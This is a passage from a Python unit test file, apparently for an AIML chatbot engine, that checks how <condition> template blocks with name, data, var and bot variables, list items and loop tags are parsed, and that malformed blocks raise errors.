self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.GLOBAL)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_typedata_name_attr_val_child(self):
template = ET.fromstring("""
<template>
<condition data="aname">
<value>avalue</value>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.DATA)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_typevar_name_attr_val_child(self):
template = ET.fromstring("""
<template>
<condition var="aname">
<value>avalue</value>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.LOCAL)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_bot_name_attr_val_child(self):
template = ET.fromstring("""
<template>
<condition bot="aname">
<value>avalue</value>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.BOT)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_typename_name_child_val_attr(self):
template = ET.fromstring("""
<template>
<condition value="avalue">
<name>aname</name>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.GLOBAL)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_typedata_name_child_val_attr(self):
template = ET.fromstring("""
<template>
<condition value="avalue">
<data>aname</data>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.DATA)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_typevar_name_child_val_attr(self):
template = ET.fromstring("""
<template>
<condition value="avalue"><var>aname</var>X</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.LOCAL)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_bot_name_child_val_attr(self):
template = ET.fromstring("""
<template>
<condition value="avalue">
<bot>aname</bot>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.BOT)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_typename_name_child_val_child(self):
template = ET.fromstring("""
<template>
<condition>
<name>aname</name>
<value>avalue</value>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.GLOBAL)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_typedata_name_child_val_child(self):
template = ET.fromstring("""
<template>
<condition>
<data>aname</data>
<value>avalue</value>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.DATA)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_typevar_name_child_val_child(self):
template = ET.fromstring("""
<template>
<condition>
<var>aname</var>
<value>avalue</value>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.LOCAL)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_bot_name_child_val_child(self):
template = ET.fromstring("""
<template>
<condition>
<bot>aname</bot>
<value>avalue</value>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.BOT)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_duplicate_typename(self):
template = ET.fromstring("""
<template>
<condition>
<name>aname</name>
<value>avalue</value>
<name>aname</name>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_duplicate_typedata(self):
template = ET.fromstring("""
<template>
<condition>
<data>aname</data>
<value>avalue</value>
<data>aname</data>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_duplicate_typevar(self):
template = ET.fromstring("""
<template>
<condition>
<var>aname</var>
<value>avalue</value>
<var>aname</var>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_duplicate_typebot(self):
template = ET.fromstring("""
<template>
<condition>
<bot>aname</bot>
<value>avalue</value>
<bot>aname</bot>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_block_name_and_data(self):
template = ET.fromstring("""
<template>
<condition name="name">
<data>aname</data>
<value>avalue</value>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_block_name_and_var(self):
template = ET.fromstring("""
<template>
<condition name="name">
<var>aname</var>
<value>avalue</value>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_block_data_and_bot(self):
template = ET.fromstring("""
<template>
<condition data="name">
<bot>aname</bot>
<value>avalue</value>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_block_multi_value(self):
template = ET.fromstring("""
<template>
<condition>
<value>avalue</value>
<bot>aname</bot>
<value>avalue</value>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_block_loop(self):
template = ET.fromstring("""
<template>
<condition>
<name>name</name>
<value>value</value>
<loop />
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_block_li(self):
template = ET.fromstring("""
<template>
<condition>
<data>name</data>
<value>value</value>
<li>X</li>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
##################################################################################################################
# Single (type2)
#
def test_condition_template_single_typename_name_child_value_attrs(self):
template = ET.fromstring("""
<template>
<condition>
<name>aname</name>
<li value="a">A</li>
<li value="b">B</li>
<li><value>c</value>C</li>
<li>D</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.var_type, TemplateConditionVariable.GLOBAL)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertEqual(len(template_node.children), 4)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "A")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "B")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "C")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "D")
def test_condition_template_single_typename_name_child_value_attrs_loop(self):
template = ET.fromstring("""
<template>
<condition>
<name>aname</name>
<li value="a">A <loop /></li>
<li value="b">B</li>
<li><value>c</value>C</li>
<li>D</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.var_type, TemplateConditionVariable.GLOBAL)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertEqual(len(template_node.children), 4)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertTrue(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "A")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "B")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "C")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "D")
def test_condition_template_single_typedata_name_child_value_attrs(self):
template = ET.fromstring("""
<template>
<condition>
<data>aname</data>
<li value="a">A</li>
<li value="b">B</li>
<li><value>c</value>C</li>
<li>D</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.var_type, TemplateConditionVariable.DATA)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertEqual(len(template_node.children), 4)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "A")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "B")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "C")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "D")
def test_condition_template_single_typedata_name_child_value_attrs_loop(self):
template = ET.fromstring("""
<template>
<condition>
<data>aname</data>
<li value="a">A</li>
<li value="b">B <loop /></li>
<li><value>c</value>C</li>
<li>D</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.var_type, TemplateConditionVariable.DATA)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertEqual(len(template_node.children), 4)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "A")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertTrue(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "B")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "C")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "D")
def test_condition_template_single_typevar_name_child_value_attrs(self):
template = ET.fromstring("""
<template>
<condition>
<var>aname</var>
<li value="a">A</li>
<li value="b">B</li>
<li><value>c</value>C</li>
<li>D</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.var_type, TemplateConditionVariable.LOCAL)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertEqual(len(template_node.children), 4)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "A")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "B")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "C")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "D")
def test_condition_template_single_typevar_name_child_value_attrs_loop(self):
template = ET.fromstring("""
<template>
<condition>
<var>aname</var>
<li value="a">A</li>
<li value="b">B</li>
<li><value>c</value>C <loop /></li>
<li>D</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.var_type, TemplateConditionVariable.LOCAL)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertEqual(len(template_node.children), 4)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "A")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "B")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertTrue(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "C")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "D")
def test_condition_template_single_typename_name_attr_value_attrs(self):
template = ET.fromstring("""
<template>
<condition name="aname">
<li value="a">A</li>
<li value="b">B</li>
<li><value>c</value>C</li>
<li>D</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.var_type, TemplateConditionVariable.GLOBAL)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertEqual(len(template_node.children), 4)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "A")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "B")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "C")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "D")
def test_condition_template_single_typedata_name_attr_value_attrs(self):
template = ET.fromstring("""
<template>
<condition data="aname">
<li value="a">A</li>
<li value="b">B</li>
<li><value>c</value>C</li>
<li>D</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.var_type, TemplateConditionVariable.DATA)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertEqual(len(template_node.children), 4)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "A")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "B")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "C")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "D")
def test_condition_template_single_typevar_name_attr_value_attrs(self):
template = ET.fromstring("""
<template>
<condition var="aname">
<li value="a">A</li>
<li value="b">B</li>
<li><value>c</value>C</li>
<li>D</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.var_type, TemplateConditionVariable.LOCAL)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertEqual(len(template_node.children), 4)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "A")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "B")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "C")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "D")
def test_condition_template_single_bot_name_attr_value_attrs(self):
template = ET.fromstring("""
<template>
<condition bot="aname">
<li value="a">A</li>
<li value="b">B</li>
<li><value>c</value>C</li>
<li>D</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.var_type, TemplateConditionVariable.BOT)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertEqual(len(template_node.children), 4)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "A")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "B")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "C")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "D")
def test_condition_template_Single_invalid_tag(self):
